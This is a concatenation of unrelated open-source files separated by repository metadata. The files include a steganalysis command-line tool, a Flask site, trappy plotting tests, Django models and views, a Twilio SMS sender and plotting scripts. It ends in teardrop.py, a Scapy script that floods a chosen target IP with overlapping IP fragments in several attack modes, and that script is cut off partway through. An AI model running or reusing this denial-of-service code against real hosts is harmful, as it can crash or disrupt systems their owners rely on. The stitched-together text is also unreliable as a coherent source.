        print " - lsbr-sim: Embedding using LSB replacement simulator."
        print " - lsbm-sim: Embedding using LSB matching simulator."
        print " - hugo-sim: Embedding using HUGO simulator."
        print " - wow-sim: Embedding using WOW simulator."
        print " - s-uniward-sim: Embedding using S-UNIWARD simulator."
        print " - hill-sim: Embedding using HILL simulator."
        print ""
        print " Model training:"
        print " - esvm: Ensemble of Support Vector Machines."
        print " - e4s: Ensemble Classifiers for Steganalysis."
        print " - xu-net: Convolutional Neural Network for Steganalysis."
        print ""
        print "\n"
        sys.exit(0)

    # Dummy first branch so every real command is a uniform elif.
    if False: pass

    # -- ATTACKS --

    # {{{ spa
    elif sys.argv[1]=="spa":

        if len(sys.argv)!=3:
            print sys.argv[0], "spa <image>\n"
            sys.exit(0)

        if not utils.is_valid_image(sys.argv[2]):
            print "Please, provide a valid image"
            sys.exit(0)

        threshold=0.05
        bitrate_R=attacks.spa(sys.argv[2], 0)
        bitrate_G=attacks.spa(sys.argv[2], 1)
        bitrate_B=attacks.spa(sys.argv[2], 2)

        if bitrate_R<threshold and bitrate_G<threshold and bitrate_B<threshold:
            print "No hiden data found"
            sys.exit(0)

        if bitrate_R>=threshold:
            print "Hiden data found in channel R", bitrate_R
        if bitrate_G>=threshold:
            print "Hiden data found in channel G", bitrate_G
        if bitrate_B>=threshold:
            print "Hiden data found in channel B", bitrate_B
        sys.exit(0)
    # }}}

    # {{{ rs
    elif sys.argv[1]=="rs":

        if len(sys.argv)!=3:
            print sys.argv[0], "spa <image>\n"
            sys.exit(0)

        if not utils.is_valid_image(sys.argv[2]):
            print "Please, provide a valid image"
            sys.exit(0)

        threshold=0.05
        bitrate_R=attacks.rs(sys.argv[2], 0)
        bitrate_G=attacks.rs(sys.argv[2], 1)
        bitrate_B=attacks.rs(sys.argv[2], 2)

        if bitrate_R<threshold and bitrate_G<threshold and bitrate_B<threshold:
            print "No hiden data found"
            sys.exit(0)

        if bitrate_R>=threshold:
            print "Hiden data found in channel R", bitrate_R
        if bitrate_G>=threshold:
            print "Hiden data found in channel G", bitrate_G
        if bitrate_B>=threshold:
            print "Hiden data found in channel B", bitrate_B
        sys.exit(0)
    # }}}

    # -- ML-BASED DETECTORS --

    # {{{ esvm
    elif sys.argv[1]=="esvm-predict":

        if len(sys.argv)!=5:
            print sys.argv[0], "esvm-predict <model-file> <feature-extractor> <image/dir>\n"
            print "Feature extractors:"
            print " - srm: Full Spatial Rich Models."
            print " - srmq1: Spatial Rich Models with fixed quantization q=1c."
            print ""
            sys.exit(0)

        model_file=sys.argv[2]
        extractor=sys.argv[3]
        path=utils.absolute_path(sys.argv[4])

        # Collect all valid image paths (recursively for a directory).
        files=[]
        if os.path.isdir(path):
            for dirpath,_,filenames in os.walk(path):
                for f in filenames:
                    path=os.path.abspath(os.path.join(dirpath, f))
                    if not utils.is_valid_image(path):
                        print "Warning, please provide a valid image: ", f
                    else:
                        files.append(path)
        else:
            files=[path]

        clf=pickle.load(open(model_file, "r"))
        for f in files:
            if extractor=="srm": X = richmodels.SRM_extract(f)
            if extractor=="srmq1": X = richmodels.SRMQ1_extract(f)
            X = X.reshape((1, X.shape[0]))
            p = clf.predict_proba(X)
            print p
            if p[0][0] > 0.5:
                print os.path.basename(f), "Cover, probability:", p[0][0]
            else:
                print os.path.basename(f), "Stego, probability:", p[0][1]
    # }}}

    # {{{ e4s
    elif sys.argv[1]=="e4s-predict":

        if len(sys.argv)!=5:
            print sys.argv[0], "e4s-predict <model-file> <feature-extractor> <image/dir>\n"
            print "Feature extractors:"
            print " - srm: Full Spatial Rich Models."
            print " - srmq1: Spatial Rich Models with fixed quantization q=1c."
            print ""
            sys.exit(0)

        model_file=sys.argv[2]
        extractor=sys.argv[3]
        path=utils.absolute_path(sys.argv[4])

        # Collect all valid image paths (recursively for a directory).
        files=[]
        if os.path.isdir(path):
            for dirpath,_,filenames in os.walk(path):
                for f in filenames:
                    path=os.path.abspath(os.path.join(dirpath, f))
                    if not utils.is_valid_image(path):
                        print "Warning, please provide a valid image: ", f
                    else:
                        files.append(path)
        else:
            files=[path]

        clf=models.Ensemble4Stego()
        clf.load(model_file)
        for f in files:
            if extractor=="srm": X = richmodels.SRM_extract(f)
            if extractor=="srmq1": X = richmodels.SRMQ1_extract(f)
            X = X.reshape((1, X.shape[0]))
            p = clf.predict_proba(X)
            print p
            if p[0][0] > 0.5:
                print os.path.basename(f), "Cover, probability:", p[0][0]
            else:
                print os.path.basename(f), "Stego, probability:", p[0][1]
    # }}}

    # -- FEATURE EXTRACTORS --

    # {{{ srm
    elif sys.argv[1]=="srm":

        if len(sys.argv)!=4:
            print sys.argv[0], "srm <image/dir> <output-file>\n"
            sys.exit(0)

        image_path=sys.argv[2]
        ofile=sys.argv[3]

        extract_features(richmodels.SRM_extract, image_path, ofile)
    # }}}

    # {{{ srmq1
    elif sys.argv[1]=="srmq1":

        if len(sys.argv)!=4:
            print sys.argv[0], "srm <image/dir> <output-file>\n"
            sys.exit(0)

        image_path=sys.argv[2]
        ofile=sys.argv[3]

        extract_features(richmodels.SRMQ1_extract, image_path, ofile)
    # }}}

    # -- EMBEDDING SIMULATORS --

    # {{{ lsbr-sim
    elif sys.argv[1]=="lsbr-sim":

        if len(sys.argv)!=5:
            print sys.argv[0], "lsbr-sim <image/dir> <payload> <output-dir>\n"
            sys.exit(0)

        embed_message(stegosim.lsbr, sys.argv[2], sys.argv[3], sys.argv[4])
    # }}}

    # {{{ lsbm-sim
    elif sys.argv[1]=="lsbm-sim":

        if len(sys.argv)!=5:
            print sys.argv[0], "lsbm-sim <image/dir> <payload> <output-dir>\n"
            sys.exit(0)

        embed_message(stegosim.lsbm, sys.argv[2], sys.argv[3], sys.argv[4])
    # }}}

    # {{{ hugo-sim
    elif sys.argv[1]=="hugo-sim":

        if len(sys.argv)!=5:
            print sys.argv[0], "hugo-sim <image/dir> <payload> <output-dir>\n"
            sys.exit(0)

        embed_message(stegosim.hugo, sys.argv[2], sys.argv[3], sys.argv[4])
    # }}}

    # {{{ wow-sim
    elif sys.argv[1]=="wow-sim":

        if len(sys.argv)!=5:
            print sys.argv[0], "wow-sim <image/dir> <payload> <output-dir>\n"
            sys.exit(0)

        embed_message(stegosim.wow, sys.argv[2], sys.argv[3], sys.argv[4])
    # }}}

    # {{{ s-uniward-sim
    elif sys.argv[1]=="s-uniward-sim":

        if len(sys.argv)!=5:
            print sys.argv[0], "s-uniward-sim <image/dir> <payload> <output-dir>\n"
            sys.exit(0)

        embed_message(stegosim.s_uniward, sys.argv[2], sys.argv[3], sys.argv[4])
    # }}}

    # {{{ hill-sim
    elif sys.argv[1]=="hill-sim":

        # NOTE(review): usage string says "s-uniward-sim" here -- likely a
        # copy/paste slip in the original; left untouched in this pass.
        if len(sys.argv)!=5:
            print sys.argv[0], "s-uniward-sim <image/dir> <payload> <output-dir>\n"
            sys.exit(0)

        embed_message(stegosim.hill, sys.argv[2], sys.argv[3], sys.argv[4])
    # }}}

    # -- MODEL TRAINING --

    # {{{ esvm
    elif sys.argv[1]=="esvm":

        if len(sys.argv)!=5:
            print sys.argv[0], "esvm <cover-fea> <stego-fea> <model-file>\n"
            sys.exit(0)

        from sklearn.model_selection import train_test_split

        cover_fea=sys.argv[2]
        stego_fea=sys.argv[3]
        model_file=sys.argv[4]

        X_cover = pandas.read_csv(cover_fea, delimiter = " ").values
        X_stego = pandas.read_csv(stego_fea, delimiter = " ").values
        #X_cover=numpy.loadtxt(cover_fea)
        #X_stego=numpy.loadtxt(stego_fea)

        # Label covers 0 and stegos 1, hold out 10% for validation.
        X=numpy.vstack((X_cover, X_stego))
        y=numpy.hstack(([0]*len(X_cover), [1]*len(X_stego)))
        X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.10)

        clf=models.EnsembleSVM()
        clf.fit(X_train, y_train)
        val_score=clf.score(X_val, y_val)

        pickle.dump(clf, open(model_file, "wb"))
        print "Validation score:", val_score
    # }}}

    # {{{ e4s
    elif sys.argv[1]=="e4s":

        if len(sys.argv)!=5:
            print sys.argv[0], "e4s <cover-fea> <stego-fea> <model-file>\n"
            sys.exit(0)

        from sklearn.model_selection import train_test_split

        cover_fea=sys.argv[2]
        stego_fea=sys.argv[3]
        model_file=sys.argv[4]

        X_cover = pandas.read_csv(cover_fea, delimiter = " ").values
        X_stego = pandas.read_csv(stego_fea, delimiter = " ").values
        #X_cover=numpy.loadtxt(cover_fea)
        #X_stego=numpy.loadtxt(stego_fea)

        # Label covers 0 and stegos 1, hold out 10% for validation.
        X=numpy.vstack((X_cover, X_stego))
        y=numpy.hstack(([0]*len(X_cover), [1]*len(X_stego)))
        X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.10)

        clf=models.Ensemble4Stego()
        clf.fit(X_train, y_train)
        val_score=clf.score(X_val, y_val)

        clf.save(model_file)
        print "Validation score:", val_score
    # }}}

    # {{{ xu-net
    elif sys.argv[1]=="xu-net":

        if len(sys.argv)!=5:
            print sys.argv[0], "xu-net <cover-dir> <stego-dir> <model-name>\n"
            sys.exit(0)

        cover_dir=sys.argv[2]
        stego_dir=sys.argv[3]
        model_name=sys.argv[4]

        net = models.XuNet()
        net.train(cover_dir, stego_dir, val_size=0.10, name=model_name)
        #print "Validation score:", val_score
    # }}}

    else:
        print "Wrong command!"

    # NOTE(review): "train-models" falls through the elif chain (printing
    # "Wrong command!") before reaching this hook; train_models() also
    # depends on the commented-out cnn import -- confirm intent.
    if sys.argv[1]=="train-models":
        train_models()
# Script entry point.
if __name__ == "__main__":
    main()
| [
"dlerch@gmail.com"
] | dlerch@gmail.com |
b4fe0c005b0e338604ba89b0d2ea585deaed9afa | 9aadbeff047dc7b4202db390de8eb32a2ad64669 | /flask-website/app.py | 3beeafc3f139c01b9ad92b87034dd51c94ab24ae | [
"MIT"
] | permissive | MLH-Fellowship/Dakshina-Gina | 1e851a319f44a0368c3eecd0827b403fdf6ba5a0 | 71b7ccc74c9699769f71a47b0d2c9fcb6b1b4655 | refs/heads/master | 2023-06-11T01:55:30.930979 | 2021-06-11T23:28:37 | 2021-06-11T23:28:37 | 375,489,248 | 0 | 1 | MIT | 2021-06-11T23:28:38 | 2021-06-09T21:05:50 | Python | UTF-8 | Python | false | false | 477 | py | from dotenv import load_dotenv
from flask import Flask, render_template

# Pull variables from a local .env file into the environment before the
# application object is created.
load_dotenv()

app = Flask(__name__)


@app.route('/')
def hello():
    """Landing page with the portfolio title."""
    return render_template("index.html", title="Name's Portfolio")


@app.route('/about')
def about():
    """Static 'about' page."""
    return render_template("about.html")


@app.route('/experience')
def experience():
    """Static 'experience' page."""
    return render_template("experience.html")


@app.route('/projects')
def projects():
    """Static 'projects' page."""
    return render_template("projects.html")
| [
"dakshinabp@berkeley.edu"
] | dakshinabp@berkeley.edu |
d10ddb39438c9ea14084f6d4488f312ad7e49a26 | f307f0c0cd2c3241be7b7115219c1c161e3f7f9e | /tests/test_plotter.py | 520d10e431e475ba64b851d9b10aeed5dff252b6 | [
"Apache-2.0"
] | permissive | freedomtan/trappy | 0471250a5558b50b946365d8a62c91d44e1620a0 | 3f573b07592e3d5f423d47d31ac4650fc9f09125 | refs/heads/master | 2020-05-20T18:31:47.019077 | 2015-11-24T02:04:55 | 2015-11-24T02:05:07 | 46,760,363 | 0 | 0 | null | 2015-11-24T01:58:46 | 2015-11-24T01:58:45 | null | UTF-8 | Python | false | false | 4,520 | py | # Copyright 2015-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import matplotlib
import pandas as pd
import tempfile
import os
from test_thermal import BaseTestThermal
import trappy
class TestPlotter(BaseTestThermal):
    """No Bombing testcases for plotter.

    Each test builds one or more trappy Runs from the shared fixture
    trace and checks that LinePlot renders without raising.  The
    redundant ``__init__`` override (which only forwarded to the parent
    constructor with identical arguments) has been removed.
    """

    def test_plot_no_pivot(self):
        """Tests LinePlot with no pivot"""
        run1 = trappy.Run(name="first")
        l = trappy.LinePlot(run1, trappy.thermal.Thermal, column="temp")
        l.view(test=True)

    def test_plot_multi_run(self):
        """Tests LinePlot with no Pivot multi runs"""
        run1 = trappy.Run(name="first")
        run2 = trappy.Run(name="second")
        l = trappy.LinePlot(
            [run1, run2], trappy.thermal.Thermal, column="temp")
        l.view(test=True)

    def test_plot_multi(self):
        """Tests LinePlot with no Pivot multi attrs"""
        run1 = trappy.Run(name="first")
        run2 = trappy.Run(name="second")
        l = trappy.LinePlot([run1,
                             run2],
                            [trappy.thermal.Thermal,
                             trappy.thermal.ThermalGovernor],
                            column=["temp",
                                    "power_range"])
        l.view(test=True)

    def test_plot_filter(self):
        """Tests LinePlot with no Pivot with filters"""
        run1 = trappy.Run(name="first")
        run2 = trappy.Run(name="second")
        l = trappy.LinePlot([run1,
                             run2],
                            [trappy.cpu_power.CpuOutPower],
                            column=["power"],
                            filters={"cdev_state": [1]})
        l.view(test=True)

    def test_plot_pivot(self):
        """Tests LinePlot with Pivot"""
        run1 = trappy.Run(name="first")
        l = trappy.LinePlot(
            run1,
            trappy.thermal.Thermal,
            column="temp",
            pivot="thermal_zone")
        l.view(test=True)

    def test_plot_multi_run_pivot(self):
        """Tests LinePlot with Pivot multi runs"""
        run1 = trappy.Run(name="first")
        run2 = trappy.Run(name="second")
        l = trappy.LinePlot(
            [run1, run2], trappy.cpu_power.CpuOutPower, column="power", pivot="cpus")
        l.view(test=True)

    def test_plot_multi_pivot(self):
        """Tests LinePlot with Pivot with multi attrs"""
        run1 = trappy.Run(name="first")
        run2 = trappy.Run(name="second")
        l = trappy.LinePlot([run1,
                             run2],
                            [trappy.cpu_power.CpuInPower,
                             trappy.cpu_power.CpuOutPower],
                            column=["dynamic_power",
                                    "power"],
                            pivot="cpus")
        l.view(test=True)

    def test_plot_multi_pivot_filter(self):
        """Tests LinePlot with Pivot and filters"""
        run1 = trappy.Run(name="first")
        run2 = trappy.Run(name="second")
        l = trappy.LinePlot(
            run1,
            trappy.cpu_power.CpuInPower,
            column=[
                "dynamic_power",
                "load1"],
            filters={
                "cdev_state": [
                    1,
                    0]},
            pivot="cpus")
        l.view(test=True)

    def test_plot_savefig(self):
        """Tests plotter: savefig"""
        run1 = trappy.Run(name="first")
        # NOTE(review): run2 is never passed to the plot below; kept
        # because constructing a Run parses the fixture trace -- confirm
        # it is safe to drop before removing.
        run2 = trappy.Run(name="second")
        l = trappy.LinePlot(
            run1,
            trappy.cpu_power.CpuInPower,
            column=[
                "dynamic_power",
                "load1"],
            filters={
                "cdev_state": [
                    1,
                    0]},
            pivot="cpus")
        png_file = tempfile.mktemp(dir="/tmp", suffix=".png")
        l.savefig(png_file)
        self.assertTrue(os.path.isfile(png_file))
        os.remove(png_file)
| [
"javi.merino@arm.com"
] | javi.merino@arm.com |
07a1fe23a71e5aee8437f5a0bfa37ca7243e764c | 5d914ecf9893756183154d0c7aac8201ef82d262 | /main/migrations/0005_auto_20180728_1458.py | bb798e7de807eff1352917e89722442a1e2101a6 | [] | no_license | devxtechnologies/ams | 7f4b7c5ab035e35cb60fd17cc62a1138d686fd5d | 48836fc7a7143d6d0043a5afbcd24adec5212a59 | refs/heads/master | 2022-12-12T14:58:03.120199 | 2018-10-19T19:02:52 | 2018-10-19T19:02:52 | 146,030,630 | 1 | 1 | null | 2022-12-08T02:22:53 | 2018-08-24T19:14:04 | CSS | UTF-8 | Python | false | false | 608 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-07-28 14:58
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: makes Absentees.attendance a CASCADE
    # foreign key to main.Attendance with related_name "absentee".

    dependencies = [("main", "0004_changestatus")]

    operations = [
        migrations.AlterField(
            model_name="absentees",
            name="attendance",
            field=models.ForeignKey(
                on_delete=django.db.models.deletion.CASCADE,
                related_name="absentee",
                to="main.Attendance",
            ),
        )
    ]
| [
"amoghsk279@gmail.com"
] | amoghsk279@gmail.com |
cd9fc6a781e6443c701bace03c219fcdc0d88d96 | 98e00c48dc0ec205b6524f025791a9367a657e13 | /step12.py | 21fad4ab7b026901a4048423734036e3a6e52060 | [] | no_license | mextier/PyStepikC431 | b111d4da586f8392959850f42935f19f7e007702 | 5e2d4afca95d8f68552206defbc1b46ae6b92bbc | refs/heads/master | 2021-09-17T21:55:43.970377 | 2018-07-05T18:21:13 | 2018-07-05T18:21:13 | 115,948,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | n = int(input())
# First pass: print the Collatz trajectory of n term by term, then the
# final 1 on its own line.
while n != 1:
    print(str(n), '', end='')
    n = n // 2 if n % 2 == 0 else 3 * n + 1
print(n)

# Second pass: read a fresh start value, build the whole sequence in a
# list, then print it space-separated.
seq = [int(input())]
while seq[-1] != 1:
    last = seq[-1]
    seq.append(last // 2 if last % 2 == 0 else 3 * last + 1)
print(" ".join(str(term) for term in seq))
| [
"mextier@gmail.com"
] | mextier@gmail.com |
1aa2a0dc21caeb8dd6b71e72c95ab63ad932706f | 5f27720d72bf6fa609ccbf04ef9d164d8bf80e24 | /app/models.py | 50da83ffe619dd8e1a289c17cac953962cdc5e90 | [] | no_license | cinjon/hintofdope | 1d02aac2b941d5573cce323f119ddd423235db8a | ac70660cc05961f21a6411e8a6a86f56ea81ec95 | refs/heads/master | 2021-01-19T06:06:01.959849 | 2015-11-28T20:41:05 | 2015-11-28T20:41:05 | 40,025,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,400 | py | from app import db
from app import utility
from app import config
from app import flask_app as fapp
import random
import os
import datetime
from twilio.rest import TwilioRestClient
import message_options
from flask.ext.script import Command
class Phone(db.Model):
    """A subscriber's phone number and its outbound message history."""

    id = db.Column(db.Integer, primary_key=True)
    # Stored without the leading "+1" for US numbers; see delete_phone().
    phone_string = db.Column(db.String(25))  # International.
    creation_time = db.Column(db.DateTime)
    messages = db.relationship('Message', lazy='dynamic', backref='phone')
    deleted = db.Column(db.Boolean)      # soft-delete flag
    sent_intro = db.Column(db.Boolean)   # whether the intro text went out

    def __init__(self, phone_string):
        self.phone_string = phone_string
        self.creation_time = utility.get_time()
        self.deleted = False
        self.sent_intro = False

    def delete(self):
        # Soft delete: the row is kept but no further messages are sent.
        self.deleted = True
        db.session.commit()

    def send_intro(self):
        """Send the introduction message; marks sent_intro on success."""
        selection = get_selection(self, message_options.i)
        message = create_message(self.id, selection=selection)
        if message and message.send(self):
            self.sent_intro = True
            db.session.commit()
        else:
            fapp.logger.debug('Phone %s had intro send fail' % self.phone_string)

    def send_growth(self):
        """Send a growth message."""
        selection = get_selection(self, message_options.g)
        message = create_message(self.id, selection=selection)
        # NOTE(review): create_message() returns None for deleted phones,
        # which would raise AttributeError here -- confirm callers filter
        # deleted phones first.
        if not message.send(self):
            fapp.logger.debug('Phone %s had growth send fail.' % self.phone_string)

    def send_reintro(self):
        """Send a re-introduction message."""
        selection = get_selection(self, message_options.r)
        message = create_message(self.id, selection=selection)
        # NOTE(review): same None risk as send_growth() above.
        if not message.send(self):
            fapp.logger.debug('Phone %s had re-intro send fail' % self.phone_string)
def delete_phone(numstr):
    """Soft-delete the Phone matching ``numstr``.

    Only US numbers in "+1XXXXXXXXXX" form are handled (rows are stored
    without the "+1" prefix); any other input returns False.  Returns
    True only when a matching row was found and marked deleted.
    """
    if not numstr:
        return False
    if len(numstr) == 12 and numstr[:2] == '+1':
        phone = Phone.query.filter(Phone.phone_string == numstr[2:]).first()
        if not phone:
            return False
        # Consistency: reuse the model's soft-delete helper instead of
        # duplicating the flag assignment + commit here.
        phone.delete()
        return True
    else:  # international numbers are not supported yet
        return False
def get_or_create_phone(phone_string, commit=True):
    """Return ``(already_existed, phone)`` for ``phone_string``.

    Issues a single query instead of the previous count()+first() pair.
    """
    phone = Phone.query.filter(Phone.phone_string == phone_string).first()
    if phone is not None:
        return True, phone
    return False, create_phone(phone_string, commit)
def create_phone(phone_string, commit=True):
    """Instantiate a Phone row; commit it immediately unless told not to."""
    new_phone = Phone(phone_string)
    if not commit:
        return new_phone
    db.session.add(new_phone)
    db.session.commit()
    return new_phone
class Message(db.Model):
id = db.Column(db.Integer, primary_key=True)
selection = db.Column(db.Integer) # index of message in message_options
creation_time = db.Column(db.DateTime)
sent_time = db.Column(db.DateTime)
phone_id = db.Column(db.Integer, db.ForeignKey('phone.id'))
def __init__(self, selection):
self.selection = selection
self.creation_time = utility.get_time()
def get_body(self, signature=True):
body = message_options.options[self.selection]['body']
if signature:
body += '\n- Hint Of Dope'
return body
def send(self, phone=None):
phone = phone or Phone.query.get(self.phone_id)
body = self.get_body()
if send_by_twilio(phone.phone_string, body):
self.sent_time = utility.get_time()
db.session.commit()
return True
return False
def create_message(phone_id, selection=None, commit=True):
phone = Phone.query.get(phone_id)
if not phone or phone.deleted:
return
if selection == None:
selection = get_selection(phone)
message = Message(selection)
phone.messages.append(message)
if commit:
db.session.add(message)
db.session.commit()
return message
def filter_options(ty):
return [option for option in message_options.options if option['type'] == ty]
def get_option_type(messages):
return message_options.d
def get_selection(phone, option_type=None):
"""
Gets the next selection for the given phone. Always gets a Dope msg.
"""
def check_selection(option_type, selection_type):
if option_type == None:
return selection_type != message_options.i and \
selection_type != message_options.r and \
selection_type != message_options.g
return selection_type == option_type
messages = phone.messages.all() or []
message_selections = [m.selection for m in messages]
if not option_type:
option_type = get_option_type(messages)
counts = sorted(
[{'index':index, 'count':message_selections.count(index)} for index, option in enumerate(message_options.options) if check_selection(option_type, option['type'])],
key = lambda message: message.get('count'))
counts = [c for c in counts if c['count'] == counts[0]['count']]
random.shuffle(counts)
return counts[0]['index']
from_phone="+12132634705"
twilio_client = TwilioRestClient(config.TWILIO_ACCOUNT_SID, config.TWILIO_AUTH_TOKEN)
def send_by_twilio(to_phone, message):
try:
twilio_client.messages.create(
to=to_phone,
from_=from_phone,
body=message,
# status_callback=config.baseurl+'/twilio_callback'
)
return True
except Exception, e:
fapp.logger.debug(e)
return False
| [
"cinjon.resnick@gmail.com"
] | cinjon.resnick@gmail.com |
0ae56df89f2a55dee86afc1a502bebdfb672e566 | aca1e6d0147fb49bda7bc3f280776ecb26373fbf | /run.py | 4e35ceec41cf7c5d85563a1c5a97d605b3bd98ae | [] | no_license | kltong/learning-python | e5f88b9208afc91b1f40708095614f3ddf62aaed | 41d9192649f42ce4c7fcf302a036392b06a49b98 | refs/heads/master | 2020-03-20T04:42:46.073763 | 2018-06-13T09:28:26 | 2018-06-13T09:28:26 | 137,192,319 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | #! /usr/bin/python
# coding=utf-8
"""
第一行指明解释器位置,感叹号不可少
第二行指定文件编码
"""
print 'auto find interpreter'
| [
"kelangtong@gmail.com"
] | kelangtong@gmail.com |
c9ae5c644324ecdb021be96d94ce26419f3e607b | 09c59407cbb9717aff4dcdce3706a25134257844 | /M+2018figs/fig3.py | fc1f3b1d52b7413d480e8d43e3c6791861833767 | [
"MIT"
] | permissive | mwest007/mhd-ray-tracing | 2c48b0105ad63f3119c1e8ab731583733afc122c | bfa0ee0a2127ded8e602aba88f5af9fc3d8e38bb | refs/heads/master | 2022-03-31T06:56:00.185085 | 2019-06-07T16:13:51 | 2019-06-07T16:13:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,646 | py | # Path relative to main directory
import sys
sys.path.append('../')
# Create a tmp file to pass the chosen field class to wkb class
f = open('tmp_config.py','w')
f.write('fieldclass=\'Dipole3dCase1\'')
f.close()
# Import
import matplotlib.pyplot as plt
import matplotlib.colors
import wkb_fast_zerobeta as wkb
import numpy as np
import math
# Remove the f
import os
os.remove('tmp_config.py')
from magnetic_field import Dipole3dCase1 as magnetic_field
# Plot fieldlines as contours of the flux functon
y0 = -2.01
y1 = 2.01
z0 = 0.
z1 = 3.01
ny = 4*100
nz = ny
gy = np.linspace(y0,y1,ny)
gz = np.linspace(z0,z1,nz)
ax = np.zeros([ny,nz])
speed = np.zeros([ny,nz])
for iz in range(0,nz-1):
for iy in range(0,ny-1):
b = magnetic_field(0.0,gy[iy], gz[iz])
ax[iz,iy] = b.ax
speed[iz,iy] = b.abs
#plt.rcParams['contour.negative_linestyle'] = 'solid'
plt.contour(gy,gz,ax,levels=[0],colors='red')
#plt.contourf(gy,gz,speed,levels=[0.,0.1],colors='blue')
#plt.contourf(gy,gz,speed,levels=[0.1,0.5],colors='lime')
#plt.contourf(gy,gz,speed,levels=[0.5,1.2],colors='yellow')
#plt.contourf(gy,gz,speed,levels=[1.2,10.],colors='orange')
#plt.contourf(gy,gz,speed,levels=[10,1000],colors='black')
listofcolors=['blue','lime','yellow','orange','black']
plt.contourf(gy,gz,speed,levels=[0.,0.1,0.5,1.2,10.,1000],colors=listofcolors)
#plt.colorbar(ticks=[0.,0.1,0.5,1.2,10.],label='va',orientation='horizontal')
#plt.colorbar(ticks=[0.,0.1,0.5,1.2,10.],label='$v_A$')
plt.colorbar(ticks=[0.,0.1,0.5,1.2,10.])
plt.xlabel('y')
plt.ylabel('z')
plt.title('$v_A$')
plt.axis([-2,2, 0,3])
plt.savefig('fig3.png',dpi=300)
#plt.show()
| [
"jonathanthurgood1989@gmail.com"
] | jonathanthurgood1989@gmail.com |
6e095dfc4bde23ec68cf1de2a2e2a66d10092036 | 820f0e4f861eeda5700d149dabe77afe9a8fd5ee | /blog/views.py | d5b8d926594c64906ac1d94b2eb74b2442553047 | [] | no_license | aldnav/old_aldnav_website | b6cd026ef6ce38763b6f63c11880b64d574bd8d4 | 0c465055607646cb154bb9ba38de79356d6999c6 | refs/heads/master | 2023-04-05T07:31:47.887944 | 2014-04-16T03:32:06 | 2014-04-16T03:32:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.template import RequestContext, loader
from blog.models import Post, Tag, Like
def index(request):
latest_post_list = Post.objects.all().order_by('-pub_date')[:5]
tags_list = Tag.objects.all().order_by('name')
template = loader.get_template('posts/index.html')
context = RequestContext(request,{
'latest_post_list': latest_post_list,
'tags_list': tags_list,
})
return HttpResponse(template.render(context))
def detail(request, post_id):
post = get_object_or_404(Post, pk=post_id)
num_likes = post.like_set.all().count()
return render(request, 'posts/detail.html', {'post': post, 'likes':num_likes})
def article(request, post_slug):
post = get_object_or_404(Post, slug=post_slug)
tags = Tag.objects.filter(posts__id__exact=post.id)
return render(request, 'posts/detail.html', {'post': post, 'tags': tags})
def results(request, post_id):
return HttpResponse("You're looking at the results of post %s." % post_id)
def like(request, post_slug):
post = get_object_or_404(Post, slug=post_slug)
return render(request, 'posts/detail.html', {'post': post})
# def like(request, post_slug):
# post = get_object_or_404(Post, slug=post_slug)
# new_like, created = Like.objects.get_or_create(user=get_client_ip(request))
# if created:
# return render(request, 'posts/detail.html', {'post': post})
# else:
# return render(request, 'posts/detail.html', {'post': post})
#
# def get_client_ip(request):
# x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
# if x_forwarded_for:
# ip = x_forwarded_for.split(',')[0]
# else:
# ip = request.META.get('REMOTE_ADDR')
# return ip | [
"aldrinnavarro16@gmail.com"
] | aldrinnavarro16@gmail.com |
375f9340d1d501448cc0ffef1a88f203143cf815 | e046ee15fbb1425294baa4e34b343c21a6ab42e6 | /teardrop.py | 9a4861e835303dd8b03b2dd014d6e9dea283e219 | [
"MIT"
] | permissive | contriveone/neonetsecproj | 2b94ff6073657a6ada1eda27480fd8b9ab8f6c43 | fb1b0083d2a1bf06da1d4edf8738aa7d69eec03b | refs/heads/master | 2021-09-08T02:24:34.696484 | 2018-03-05T23:32:56 | 2018-03-05T23:32:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,399 | py | #!/usr/bin/env python
import sys
from scapy.all import *
total = len(sys.argv)
if total != 3:
print ("Performs teardrop attack from Kali Linux")
print (" ")
print ("Usage: ./tear TARGET-IP ATTACK-CODE")
print (" Attack Codes:")
print (" 0: small payload (36 bytes), 2 packets, offset=3x8 bytes")
print (" 1: large payload (1300 bytes), 2 packets, offset=80x8 bytes")
print (" 2: large payload (1300 bytes), 12 packets, offset=80x8 bytes")
print (" 3: large payload (1300 bytes), 2 packets, offset=3x8 bytes")
print (" 4: large payload (1300 bytes), 2 packets, offset=10x8 bytes")
target=str(sys.argv[1])
attack=sys.argv[2]
print ('Attacking target ' + target + ' with attack ' + attack)
if attack == '0':
print ("Using attack 0")
size=36
offset=3
load1="\x00"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
size=4
offset=18
load2="\x00"*size
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
# test with a upd package
# u = UDP(dport=53)
# print ('length of arbitrary payload is equal with udp pack' if u.__len__() == load1.__len__() else 'they are not equal')
send(i/load1)
send(j/load2)
elif attack == '1':
print ("Using attack 1")
size=1300
offset=80
load="A"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load)
send(j/load)
elif attack == '2':
print ("Using attack 2")
print ("Attacking with attack 2")
size=1300
offset=80
load="A"*size
i=IP()
i.dst=target
i.proto=17
i.flags="MF"
i.frag=0
send(i/load)
print ("Attack 2 packet 0")
for x in range(1, 10):
i.frag=offset
offset=offset+80
send(i/load)
print ("Attack 2 packet " + str(x))
i.frag=offset
i.flags=0
